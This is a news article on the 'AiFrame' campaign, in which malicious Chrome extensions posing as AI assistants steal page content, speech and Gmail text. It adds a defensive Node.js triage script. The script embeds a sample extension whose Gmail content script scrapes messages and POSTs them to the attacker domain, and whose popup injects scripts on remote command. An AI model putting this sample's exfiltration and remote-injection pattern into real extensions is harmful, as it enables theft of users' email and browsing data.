More than 30 malicious Chrome extensions installed by at least 260,000 users purport to be helpful AI assistants, but they steal users' API keys, email messages, and other personal data. Even worse: many of these are still available on the Chrome Web Store as of this writing.
Some of these extensions impersonate specific chatbots such as Claude, ChatGPT, Gemini, and Grok, while others claim to be more generic AI assistant tools that help users summarize documents, write messages, and provide Gmail assistance.
Despite different names and extension IDs, all of them use the same underlying codebase and permissions, and all 32 extensions communicate with infrastructure under the tapnetic[.]pro domain, according to LayerX Security, which uncovered the campaign and named it AiFrame.
Some of them were published under new IDs after earlier versions were removed. For example, AI Sidebar (gghdfkafnhfpaooiolhncejnlgglhkhe), which had 50,000 users at the time of LayerX Security's report, appeared after the earlier Gemini AI Sidebar (fppbiomdkfbhgjjdmojlogeceejinadg), which had 80,000 users, was removed from the Chrome Web Store. The Register found that the re-uploaded extension (gghdfkafnhfpaooiolhncejnlgglhkhe) is now listed with 70,000 users as of publication.
Google did not immediately respond to The Register's inquiries about the malicious extensions.
All 32 extension IDs are listed in LayerX's report, so be sure to check it before adding any AI assistant extension to your browser.
Another extension that is still available at the time of this writing is called AI Assistant (nlhpidbjmmffhoogcennoiopekbiglbp) and has 60,000 users. This one, which earned the "Featured" badge on the Chrome Web Store, points users to a remote domain (claude.tapnetic[.]pro).
It has an iframe overlay that visually appears to be the extension's interface, and this iframe lets the operator load remote content, changing the UI and logic and silently adding new capabilities at any time without any Chrome Web Store update. Because the logic that matters lives on the operator's server rather than in the package, what store reviewers inspect is not what users actually run.
"When instructed by the iframe, the extension queries the active tab and invokes a content script that extracts readable article content using Mozilla's Readability library," LayerX Security researcher Natalie Zargarov wrote. "The extracted data includes titles, text content, excerpts, and site metadata."
The extension then sends this data – along with authentication details for any page the user is viewing – back to the remote iframe.
In addition to hoovering up all sorts of page content from every site a user visits, this particular extension also supports speech recognition. It transcribes the user's words and sends them back to the remote page for the operator to read.
Interestingly, nearly half of the extensions target Gmail and share the same Gmail integration codebase. This lets the extension read visible email content directly from the DOM and extract message text via textContent from Gmail's conversation view. This includes email thread content and even draft or compose-related text, which is then sent to remote servers.
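As an added example (not code from The Register, LayerX, or the extensions themselves), the following Node.js script performs the static triage a practitioner would run over an unpacked extension to flag the pattern described above: a remote iframe that drives the extension over postMessage, script injection into the active tab on the iframe's command, and a Gmail content script that reads message text via textContent. The three extension IDs and the tapnetic[.]pro domain are taken from the article; SAMPLE_EXTENSION is a constructed sketch of the pattern (its selectors, file names, and message format are assumptions, not the real extension's code), and the finding strings and regexes are this example's own heuristics.

```javascript
"use strict";

// Indicators taken from the article: the three IDs named in the text and the C2 domain.
const KNOWN_BAD_IDS = new Set([
  "gghdfkafnhfpaooiolhncejnlgglhkhe", // AI Sidebar (re-uploaded)
  "fppbiomdkfbhgjjdmojlogeceejinadg", // Gemini AI Sidebar (removed from the store)
  "nlhpidbjmmffhoogcennoiopekbiglbp", // AI Assistant
]);
const KNOWN_BAD_DOMAINS = ["tapnetic.pro"];

// Constructed sketch of the AiFrame pattern: file name -> contents of an unpacked extension.
// This is an assumption of what such a package looks like, not the real extension's code.
const SAMPLE_EXTENSION = {
  id: "nlhpidbjmmffhoogcennoiopekbiglbp",
  files: {
    "manifest.json": JSON.stringify({
      manifest_version: 3,
      name: "AI Assistant",
      permissions: ["tabs", "scripting", "activeTab"],
      host_permissions: ["<all_urls>"],
      action: { default_popup: "popup.html" },
      content_scripts: [{ matches: ["https://mail.google.com/*"], js: ["gmail.js"] }],
    }),
    // The visible "UI" is a remote page; the package itself carries almost no logic.
    "popup.html":
      '<iframe id="app" src="https://claude.tapnetic.pro/"></iframe>' +
      '<script src="popup.js"></script>',
    // The remote page commands the extension; note there is no ev.origin check.
    "popup.js": [
      'const app = document.getElementById("app").contentWindow;',
      'window.addEventListener("message", async (ev) => {',
      '  if (ev.data.cmd !== "extract") return;',
      "  const [tab] = await chrome.tabs.query({ active: true, currentWindow: true });",
      "  const [r] = await chrome.scripting.executeScript({",
      '    target: { tabId: tab.id }, files: ["readability.js", "extract.js"] });',
      '  app.postMessage({ page: r.result }, "*");',
      "});",
    ].join("\n"),
    // Gmail content script: scrapes message text straight from the DOM and ships it out.
    "gmail.js": [
      'const msgs = [...document.querySelectorAll("[role=listitem]")].map((n) => n.textContent);',
      'fetch("https://mail.tapnetic.pro/c", { method: "POST", body: JSON.stringify(msgs) });',
    ].join("\n"),
  },
};

function hostOf(url) {
  try { return new URL(url).hostname; } catch (e) { return null; } // relative src = packaged page
}
function matchIoc(host) {
  return KNOWN_BAD_DOMAINS.find((d) => host === d || host.endsWith("." + d));
}

// Returns human-readable findings; an empty list means none of the heuristics fired.
function triageExtension(ext) {
  const findings = [];
  const manifest = JSON.parse(ext.files["manifest.json"]);
  if (KNOWN_BAD_IDS.has(ext.id)) findings.push(`id ${ext.id} is a published AiFrame extension ID`);

  const hosts = manifest.host_permissions || [];
  if (hosts.some((h) => h === "<all_urls>" || h === "*://*/*")) {
    findings.push("manifest: host_permissions cover every site the user visits");
  }
  const perms = manifest.permissions || [];
  if (perms.includes("tabs") && perms.includes("scripting")) {
    findings.push("manifest: tabs + scripting permits script injection into any tab");
  }

  for (const [name, body] of Object.entries(ext.files)) {
    if (name.endsWith(".html")) {
      const iframeSrc = /<iframe\b[^>]*\bsrc=["']([^"']+)["']/gi;
      for (let m; (m = iframeSrc.exec(body)); ) {
        const host = hostOf(m[1]);
        if (!host) continue;
        const ioc = matchIoc(host);
        findings.push(`${name}: UI is a remote iframe from ${host}${ioc ? ` (IoC ${ioc})` : ""}`);
      }
    }
    if (name.endsWith(".js")) {
      const onMessage = /addEventListener\(\s*["']message["']/.test(body);
      const injects = /chrome\.(scripting|tabs)\.executeScript/.test(body);
      const originCheck = /\.origin\b/.test(body);
      if (onMessage && injects) {
        findings.push(`${name}: message handler injects scripts${originCheck ? "" : " with no origin check"}`);
      }
      if (/postMessage\([^)]*,\s*["']\*["']\s*\)/.test(body)) {
        findings.push(`${name}: postMessage to "*" (any embedded origin can read it)`);
      }
      for (const d of KNOWN_BAD_DOMAINS) {
        if (body.includes(d)) findings.push(`${name}: references IoC domain ${d}`);
      }
    }
  }

  for (const cs of manifest.content_scripts || []) {
    if (!(cs.matches || []).some((p) => p.includes("mail.google.com"))) continue;
    for (const js of cs.js || []) {
      if (/\b(textContent|innerText)\b/.test(ext.files[js] || "")) {
        findings.push(`${js}: Gmail content script reads message text from the DOM`);
      }
    }
  }
  return findings;
}

for (const f of triageExtension(SAMPLE_EXTENSION)) console.log("[!]", f);
```

Run it with `node triage.js` to print the findings for the constructed sample; to point it at a real package, read the unpacked directory (Chrome keeps installed extensions under the profile's Extensions/<id>/<version>/ folder) into the same {name: contents} shape. The heuristics are deliberately loose: a remote iframe plus a message listener that injects scripts on request is the combination worth investigating, because it is exactly what lets an operator change behaviour without a store update, and it shows up in the package even when the IDs and domain have changed.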
"The campaign exploits the conversational nature of AI interactions, which has conditioned users to share detailed information," Zargarov said in an email. "By injecting iframes that mimic trusted AI interfaces, they've created a nearly invisible man-in-the-middle attack that intercepts everything from API keys to personal data before it ever reaches the legitimate service." ®